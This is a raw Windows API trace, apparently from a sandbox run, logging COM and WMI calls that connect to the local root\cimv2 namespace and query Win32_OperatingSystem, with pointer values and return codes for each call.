	[0219.662] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd11dc0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec110 | out: ppvObject=0x1c6ec110*=0x0) returned 0x80004002
	[0219.662] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd11dc0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0f8 | out: ppvObject=0x1c6ec0f8*=0x1cd160a0) returned 0x0
	[0219.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd160a0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec000 | out: ppvObject=0x1c6ec000*=0x1cd160a0) returned 0x0
	[0219.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd160a0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec080 | out: ppvObject=0x1c6ec080*=0x0) returned 0x80004002
	[0219.663] WbemDefPath:IUnknown:AddRef (This=0x1cd160a0) returned 0x3
	[0219.663] CoGetContextToken (in: pToken=0x1c6ebcd0 | out: pToken=0x1c6ebcd0) returned 0x0
	[0219.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd160a0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc90 | out: ppvObject=0x1c6ebc90*=0x1b853050) returned 0x0
	[0219.663] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b853050, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebcc0 | out: pCid=0x1c6ebcc0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0219.663] WbemDefPath:IUnknown:Release (This=0x1b853050) returned 0x3
	[0219.664] CoGetContextToken (in: pToken=0x1c6ebca0 | out: pToken=0x1c6ebca0) returned 0x0
	[0219.664] WbemDefPath:IUnknown:AddRef (This=0x1cd160a0) returned 0x4
	[0219.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd160a0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebdb8 | out: ppvObject=0x1c6ebdb8*=0x0) returned 0x80004002
	[0219.664] WbemDefPath:IUnknown:Release (This=0x1cd160a0) returned 0x3
	[0219.664] WbemDefPath:IUnknown:Release (This=0x1cd160a0) returned 0x2
	[0219.664] WbemDefPath:IUnknown:Release (This=0x1cd11dc0) returned 0x0
	[0219.827] WbemDefPath:IUnknown:Release (This=0x1cd160a0) returned 0x1
	[0219.828] CoGetContextToken (in: pToken=0x1c6ec9d0 | out: pToken=0x1c6ec9d0) returned 0x0
	[0219.828] CoGetContextToken (in: pToken=0x1c6ec910 | out: pToken=0x1c6ec910) returned 0x0
	[0219.828] WbemDefPath:IUnknown:AddRef (This=0x1cd160a0) returned 0x2
	[0219.828] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd160a0, riid=0x1c6eca50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6eca30 | out: ppvObject=0x1c6eca30*=0x1cd160a0) returned 0x0
	[0219.828] WbemDefPath:IUnknown:Release (This=0x1cd160a0) returned 0x2
	[0219.828] WbemDefPath:IUnknown:Release (This=0x1cd160a0) returned 0x1
	[0219.828] CoGetContextToken (in: pToken=0x1c6ecb50 | out: pToken=0x1c6ecb50) returned 0x0
	[0219.828] CoGetContextToken (in: pToken=0x1c6eca90 | out: pToken=0x1c6eca90) returned 0x0
	[0219.828] WbemDefPath:IUnknown:AddRef (This=0x1cd160a0) returned 0x2
	[0219.828] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd160a0, riid=0x1c6ecbd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecbb0 | out: ppvObject=0x1c6ecbb0*=0x1cd160a0) returned 0x0
	[0219.828] WbemDefPath:IUnknown:Release (This=0x1cd160a0) returned 0x2
	[0219.828] WbemDefPath:IUnknown:AddRef (This=0x1cd160a0) returned 0x3
	[0219.829] WbemDefPath:IWbemPath:SetText (This=0x1cd160a0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0219.829] WbemDefPath:IUnknown:Release (This=0x1cd160a0) returned 0x2
	[0219.829] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd160a0, puCount=0x1c6ece60 | out: puCount=0x1c6ece60*=0x2) returned 0x0
	[0219.829] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ece60*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece60*=0x17, pszText=0x0) returned 0x0
	[0219.829] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ece60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0219.829] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd160a0, puCount=0x1c6ece10 | out: puCount=0x1c6ece10*=0x2) returned 0x0
	[0219.829] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ece10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece10*=0x17, pszText=0x0) returned 0x0
	[0219.829] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=4, puBuffLength=0x1c6ece10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0219.829] CoGetObjectContext (in: riid=0x1c6ecd48*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd40 | out: ppv=0x1c6ecd40*=0x321868) returned 0x0
	[0219.829] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd60 | out: pAptType=0x1c6ecd60*=1) returned 0x0
	[0219.829] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece68 | out: ppvObject=0x1c6ece68*=0x0) returned 0x80004002
	[0219.830] IUnknown:Release (This=0x321868) returned 0x1
	[0219.830] CoGetClassObject (in: rclsid=0x1b82a6d8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec9f0 | out: ppv=0x1c6ec9f0*=0x1cd1e120) returned 0x0
	[0219.830] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1e120, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec700 | out: ppvObject=0x1c6ec700*=0x0) returned 0x80004002
	[0219.830] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cd1e120, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec6e8 | out: ppvObject=0x1c6ec6e8*=0x1cd1e140) returned 0x0
	[0219.830] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1e140, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5f0 | out: ppvObject=0x1c6ec5f0*=0x1cd1e140) returned 0x0
	[0219.831] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1e140, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec670 | out: ppvObject=0x1c6ec670*=0x0) returned 0x80004002
	[0219.831] WbemLocator:IUnknown:AddRef (This=0x1cd1e140) returned 0x3
	[0219.831] CoGetContextToken (in: pToken=0x1c6ec2c0 | out: pToken=0x1c6ec2c0) returned 0x0
	[0219.831] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1e140, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec280 | out: ppvObject=0x1c6ec280*=0x0) returned 0x80004002
	[0219.832] CoGetContextToken (in: pToken=0x1c6ec290 | out: pToken=0x1c6ec290) returned 0x0
	[0219.832] WbemLocator:IUnknown:AddRef (This=0x1cd1e140) returned 0x4
	[0219.832] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1e140, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec3a8 | out: ppvObject=0x1c6ec3a8*=0x0) returned 0x80004002
	[0219.832] WbemLocator:IUnknown:Release (This=0x1cd1e140) returned 0x3
	[0219.832] WbemLocator:IUnknown:Release (This=0x1cd1e140) returned 0x2
	[0219.832] WbemLocator:IUnknown:Release (This=0x1cd1e120) returned 0x0
	[0219.832] WbemLocator:IUnknown:Release (This=0x1cd1e140) returned 0x1
	[0219.832] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0219.832] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0219.832] WbemLocator:IUnknown:AddRef (This=0x1cd1e140) returned 0x2
	[0219.832] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1e140, riid=0x1c6ec930*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec910 | out: ppvObject=0x1c6ec910*=0x1cd1e140) returned 0x0
	[0219.833] WbemLocator:IUnknown:Release (This=0x1cd1e140) returned 0x2
	[0219.833] WbemLocator:IUnknown:Release (This=0x1cd1e140) returned 0x1
	[0219.833] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd160a0, puCount=0x1c6ecd10 | out: puCount=0x1c6ecd10*=0x2) returned 0x0
	[0219.833] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=8, puBuffLength=0x1c6ecd10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd10*=0x17, pszText=0x0) returned 0x0
	[0219.833] WbemDefPath:IWbemPath:GetText (in: This=0x1cd160a0, lFlags=8, puBuffLength=0x1c6ecd10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0219.833] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c6eca00 | out: ppv=0x1c6eca00*=0x1cd1e160) returned 0x0
	[0219.833] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cd1e160, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c6ecc90 | out: ppNamespace=0x1c6ecc90*=0x1cd1b2b8) returned 0x0
	[0220.624] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1b2b8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec878 | out: ppvObject=0x1c6ec878*=0x1b83c8c0) returned 0x0
	[0220.624] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b83c8c0, pProxy=0x1cd1b2b8, pAuthnSvc=0x1c6ec870, pAuthzSvc=0x1c6ec86c, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868, pImpLevel=0x1c6ec884, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880 | out: pAuthnSvc=0x1c6ec870*=0xa, pAuthzSvc=0x1c6ec86c*=0x0, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868*=0x6, pImpLevel=0x1c6ec884*=0x2, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880*=0x1) returned 0x0
	[0220.624] WbemLocator:IUnknown:Release (This=0x1b83c8c0) returned 0x1
	[0220.624] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1b2b8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec818 | out: ppvObject=0x1c6ec818*=0x1b83c900) returned 0x0
	[0220.624] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1b2b8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec7a8 | out: ppvObject=0x1c6ec7a8*=0x1b83c8c0) returned 0x0
	[0220.625] WbemLocator:IClientSecurity:SetBlanket (This=0x1b83c8c0, pProxy=0x1cd1b2b8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0220.625] WbemLocator:IUnknown:Release (This=0x1b83c8c0) returned 0x2
	[0220.625] WbemLocator:IUnknown:Release (This=0x1b83c900) returned 0x1
	[0220.625] CoTaskMemFree (pv=0x1b8395f0) 
	[0220.625] WbemLocator:IUnknown:Release (This=0x1cd1e160) returned 0x0
	[0220.625] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1b2b8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec490 | out: ppvObject=0x1c6ec490*=0x1b83c900) returned 0x0
	[0220.625] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c900, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec510 | out: ppvObject=0x1c6ec510*=0x0) returned 0x80004002
	[0220.627] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c900, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec2a8 | out: ppvObject=0x1c6ec2a8*=0x0) returned 0x80004002
	[0220.632] WbemLocator:IUnknown:AddRef (This=0x1b83c900) returned 0x3
	[0220.632] CoGetContextToken (in: pToken=0x1c6ec160 | out: pToken=0x1c6ec160) returned 0x0
	[0220.632] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c900, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec120 | out: ppvObject=0x1c6ec120*=0x1b83c7e8) returned 0x0
	[0220.632] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b83c7e8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec150 | out: pCid=0x1c6ec150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0220.632] WbemLocator:IUnknown:Release (This=0x1b83c7e8) returned 0x3
	[0220.633] CoGetContextToken (in: pToken=0x1c6ec130 | out: pToken=0x1c6ec130) returned 0x0
	[0220.633] WbemLocator:IUnknown:AddRef (This=0x1b83c900) returned 0x4
	[0220.633] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c900, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec248 | out: ppvObject=0x1c6ec248*=0x1b83c8d0) returned 0x0
	[0220.633] WbemLocator:IUnknown:Release (This=0x1b83c900) returned 0x4
	[0220.633] WbemLocator:IRpcOptions:Query (in: This=0x1b83c8d0, pPrx=0x1b83c900, dwProperty=2, pdwValue=0x1c6ec2b8 | out: pdwValue=0x1c6ec2b8) returned 0x80004002
	[0220.633] WbemLocator:IUnknown:Release (This=0x1b83c8d0) returned 0x3
	[0220.633] WbemLocator:IUnknown:Release (This=0x1b83c900) returned 0x2
	[0220.634] CoGetContextToken (in: pToken=0x1c6ec630 | out: pToken=0x1c6ec630) returned 0x0
	[0220.634] CoGetContextToken (in: pToken=0x1c6ec570 | out: pToken=0x1c6ec570) returned 0x0
	[0220.634] WbemLocator:IUnknown:AddRef (This=0x1b83c900) returned 0x3
	[0220.634] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c900, riid=0x1c6ec6b0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec690 | out: ppvObject=0x1c6ec690*=0x1cd1b2b8) returned 0x0
	[0220.634] WbemLocator:IUnknown:Release (This=0x1b83c900) returned 0x3
	[0220.634] WbemLocator:IUnknown:Release (This=0x1cd1b2b8) returned 0x2
	[0220.634] WbemLocator:IUnknown:Release (This=0x1cd1b2b8) returned 0x1
	[0220.634] CoGetContextToken (in: pToken=0x1c6ecc30 | out: pToken=0x1c6ecc30) returned 0x0
	[0220.634] WbemLocator:IUnknown:AddRef (This=0x1b83c900) returned 0x2
	[0220.635] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c900, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec800 | out: ppvObject=0x1c6ec800*=0x1b83c900) returned 0x0
	[0220.635] WbemLocator:IUnknown:Release (This=0x1b83c900) returned 0x2
	[0220.635] WbemLocator:IUnknown:Release (This=0x1b83c900) returned 0x1
	[0220.635] CoGetContextToken (in: pToken=0x1c6ec8d0 | out: pToken=0x1c6ec8d0) returned 0x0
	[0220.635] CoGetContextToken (in: pToken=0x1c6ec810 | out: pToken=0x1c6ec810) returned 0x0
	[0220.635] WbemLocator:IUnknown:AddRef (This=0x1b83c900) returned 0x2
	[0220.635] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c900, riid=0x1c6ec950*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec930 | out: ppvObject=0x1c6ec930*=0x1cd1b2b8) returned 0x0
	[0220.635] WbemLocator:IUnknown:Release (This=0x1b83c900) returned 0x2
	[0220.636] WbemLocator:IUnknown:AddRef (This=0x1cd1b2b8) returned 0x3
	[0220.636] IWbemServices:ExecQuery (in: This=0x1cd1b2b8, strQueryLanguage="WQL", strQuery="select * from Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x1c6ecdc8 | out: ppEnum=0x1c6ecdc8*=0x1cd181d8) returned 0x0
	[0220.648] IUnknown:QueryInterface (in: This=0x1cd181d8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9d8 | out: ppvObject=0x1c6ec9d8*=0x1cd181e0) returned 0x0
	[0220.648] IClientSecurity:QueryBlanket (in: This=0x1cd181e0, pProxy=0x1cd181d8, pAuthnSvc=0x1c6ec9d0, pAuthzSvc=0x1c6ec9cc, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8, pImpLevel=0x1c6ec9e4, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0 | out: pAuthnSvc=0x1c6ec9d0*=0xa, pAuthzSvc=0x1c6ec9cc*=0x0, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8*=0x6, pImpLevel=0x1c6ec9e4*=0x2, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0*=0x1) returned 0x0
	[0220.649] IUnknown:Release (This=0x1cd181e0) returned 0x1
	[0220.649] IUnknown:QueryInterface (in: This=0x1cd181d8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec978 | out: ppvObject=0x1c6ec978*=0x1b83c600) returned 0x0
	[0220.649] IUnknown:QueryInterface (in: This=0x1cd181d8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec908 | out: ppvObject=0x1c6ec908*=0x1cd181e0) returned 0x0
	[0220.649] IClientSecurity:SetBlanket (This=0x1cd181e0, pProxy=0x1cd181d8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0220.653] IUnknown:Release (This=0x1cd181e0) returned 0x2
	[0220.653] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x1
	[0220.653] CoTaskMemFree (pv=0x1b839950) 
	[0220.653] IUnknown:QueryInterface (in: This=0x1cd181d8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5b0 | out: ppvObject=0x1c6ec5b0*=0x1b83c600) returned 0x0
	[0220.653] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec630 | out: ppvObject=0x1c6ec630*=0x0) returned 0x80004002
	[0220.654] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec3c8 | out: ppvObject=0x1c6ec3c8*=0x0) returned 0x80004002
	[0220.659] WbemLocator:IUnknown:AddRef (This=0x1b83c600) returned 0x3
	[0220.659] CoGetContextToken (in: pToken=0x1c6ec280 | out: pToken=0x1c6ec280) returned 0x0
	[0220.659] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec240 | out: ppvObject=0x1c6ec240*=0x1b83c4e8) returned 0x0
	[0220.660] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b83c4e8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec270 | out: pCid=0x1c6ec270*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0220.660] WbemLocator:IUnknown:Release (This=0x1b83c4e8) returned 0x3
	[0220.660] CoGetContextToken (in: pToken=0x1c6ec250 | out: pToken=0x1c6ec250) returned 0x0
	[0220.660] WbemLocator:IUnknown:AddRef (This=0x1b83c600) returned 0x4
	[0220.660] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c600, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec368 | out: ppvObject=0x1c6ec368*=0x1b83c5d0) returned 0x0
	[0220.660] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x4
	[0220.660] WbemLocator:IRpcOptions:Query (in: This=0x1b83c5d0, pPrx=0x1b83c600, dwProperty=2, pdwValue=0x1c6ec3d8 | out: pdwValue=0x1c6ec3d8) returned 0x80004002
	[0220.660] WbemLocator:IUnknown:Release (This=0x1b83c5d0) returned 0x3
	[0220.660] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x2
	[0220.661] CoGetContextToken (in: pToken=0x1c6ec750 | out: pToken=0x1c6ec750) returned 0x0
	[0220.661] CoGetContextToken (in: pToken=0x1c6ec690 | out: pToken=0x1c6ec690) returned 0x0
	[0220.661] WbemLocator:IUnknown:AddRef (This=0x1b83c600) returned 0x3
